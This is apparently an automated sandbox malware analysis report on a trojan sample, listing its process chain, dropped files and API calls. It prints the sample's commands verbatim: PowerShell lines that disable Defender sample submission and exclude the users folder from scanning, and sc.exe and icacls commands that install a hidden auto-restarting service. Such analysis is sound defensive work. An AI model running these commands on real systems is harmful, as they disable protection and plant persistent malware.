Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572929A inet_addr,ntohl,6_2_00007FF77572929A
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,6_2_00007FF77572292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\sdjnUb5S
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll 5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll 64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: termsrv32.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: I77yQ5in.22.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: o6oDuAJl.22.drStatic PE information: Number of sections : 11 > 10
Source: OwuZZod2.22.drStatic PE information: Number of sections : 11 > 10
Source: evtsrv.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: cZO.exeStatic PE information: Number of sections : 11 > 10
Source: XpOp833v.22.drStatic PE information: Number of sections : 11 > 10
Source: GmdNT1AN.22.drStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: EgwqOk24.22.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: YXkdIYk6.22.drStatic PE information: Number of sections : 11 > 10
Source: YkhL6reh.22.drStatic PE information: Number of sections : 11 > 10
Source: cZO.exe, 00000000.00000000.2004898378.00000000007B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIntegrator.exe@ vs cZO.exe
Source: cZO.exe, 00000000.00000002.2007514026.00000000025F4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs cZO.exe
Source: cZO.exe, 00000001.00000002.3262898232.0000000002724000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs cZO.exe
Source: cZO.exeBinary or memory string: OriginalFilenameIntegrator.exe@ vs cZO.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@46/72@4/59
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,6_2_00007FF77572855D
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77573B558 DeleteCriticalSection,FindClose,FindNextFileA,FindResourceA,6_2_00007FF77573B558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE038C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF6BE038C4A
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess6524
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_03
Source: C:\Users\user\Desktop\cZO.exeFile created: C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"
Source: cZO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.ini
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cZO.exeVirustotal: Detection: 19%
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: cZO.exeString found in binary or memory: NATS-SEFI-ADD
Source: cZO.exeString found in binary or memory: NATS-DANO-ADD
Source: cZO.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: cZO.exeString found in binary or memory: jp-ocr-b-add
Source: cZO.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: cZO.exeString found in binary or memory: jp-ocr-hand-add
Source: cZO.exeString found in binary or memory: ISO_6937-2-add
Source: unknownProcess created: C:\Users\user\Desktop\cZO.exe "C:\Users\user\Desktop\cZO.exe"
Source: unknownProcess created: C:\Users\user\Desktop\cZO.exe C:\Users\user\Desktop\cZO.exe
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe "C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe"
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\Desktop\cZO.exe C:\Users\user\Desktop\cZO.exe
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\cZO.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\cZO.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: elstrans.dll
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe File written: C:\Users\user\AppData\Local\Temp\wfpblk.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: cZO.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: cZO.exe Static file information: File size 4528128 > 1048576
Source: cZO.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x355e00
Source: Binary string: RfxVmt.pdb source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: Binary string: RfxVmt.pdbGCTL source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr

Data Obfuscation

Source: C:\Users\user\Desktop\cZO.exe Unpacked PE file: 0.2.cZO.exe.2510000.1.unpack
Source: rfxvmt.dll.22.dr Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe Code function: 6_2_00007FF77572FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,6_2_00007FF77572FF1F
Source: cZO.exe Static PE information: section name: .didata
Source: vc71izwl68ub3txurufnpr09g6ni3.exe.1.dr Static PE information: section name: .xdata
Source: shdpeqdz2a54sj46ur0.exe.1.dr Static PE information: section name: .xdata
Source: main.exe.11.dr Static PE information: section name: .xdata
Source: rdpctl.dll.22.dr Static PE information: section name: .xdata
Source: samctl.dll.22.dr Static PE information: section name: .xdata
Source: prgmgr.dll.22.dr Static PE information: section name: .xdata
Source: dwlmgr.dll.22.dr Static PE information: section name: .xdata
Source: cnccli.dll.22.dr Static PE information: section name: .xdata
Source: libi2p.dll.22.dr Static PE information: section name: .xdata
Source: evtsrv.dll.22.dr Static PE information: section name: .xdata
Source: termsrv32.dll.22.dr Static PE information: section name: .xdata
Source: EgwqOk24.22.dr Static PE information: section name: .xdata
Source: OwuZZod2.22.dr Static PE information: section name: .xdata
Source: GmdNT1AN.22.dr Static PE information: section name: .xdata
Source: o6oDuAJl.22.dr Static PE information: section name: .xdata
Source: I77yQ5in.22.dr Static PE information: section name: .xdata
Source: XpOp833v.22.dr Static PE information: section name: .xdata
Source: YkhL6reh.22.dr Static PE information: section name: .xdata
Source: YXkdIYk6.22.dr Static PE information: section name: .xdata
Source: C:\Users\user\Desktop\cZO.exe Code function: 0_2_024EF262 push es; retf 0_2_024EF263
Source: C:\Users\user\Desktop\cZO.exe Code function: 0_2_024D675D push esi; ret 0_2_024D675F
Source: C:\Users\user\Desktop\cZO.exe Code function: 0_2_024D3D4E push eax; iretd 0_2_024D3D4F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 32_2_00007FF8BFB5FC37 push rsp; ret 32_2_00007FF8BFB5FC38
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B915521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,22_2_00007FF8B915521B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\GEGgzh0s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\XpOp833v
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File created: C:\Windows\Temp\I77yQ5in
